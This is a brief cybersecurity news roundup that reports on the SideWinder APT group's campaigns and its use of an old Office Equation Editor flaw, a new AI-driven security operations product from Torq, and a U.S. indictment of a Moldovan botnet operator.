More than 1,000 new attacks have been launched by the SideWinder APT group, also known as T-APT-04 or Rattlesnake, since April 2020, indicating the group's newfound aggression since it began operations a decade ago, The Hacker News reports.
SideWinder's attacks have been substantial not only in their number or frequency but also in their persistence as the group leverages a massive arsenal of encrypted and obfuscated components, according to a report from Kaspersky, which also noted the group's expanding targets and its exploitation of the ongoing conflict between Russia and Ukraine in phishing campaigns.
The report also revealed that SideWinder has been exploiting a remote code flaw in Microsoft Office's Equation Editor, tracked as CVE-2017-11882, for malicious payload deployment, with its three-stage infection chain beginning with the launching of an HTML Application payload prior to the deployment of a second-stage HTA component that then triggers a .NET-based installer with persistence and final backdoor loading duties. SideWinder has also been using at least 400 domains and subdomains in attacks since 2020.
"This threat actor has a relatively high level of sophistication using various infection vectors and advanced attack techniques," said Kaspersky's Noushin Shabab.
SiliconAngle reports that mounting security alert fatigue has prompted Torq to introduce its new HyperSOC system based on its Hyperautomation Platform using artificial intelligence to enable security operation center response automation, management, and monitoring in a bid to bolster the investigation and remediation of cybersecurity threats.
Moldovan botnet operator Alexander Lefterov, also known as Alipatime, Alipako, and Uptime, has been indicted by the U.S. Department of Justice for his involvement in widespread attacks against U.S.-based computers, BleepingComputer reports.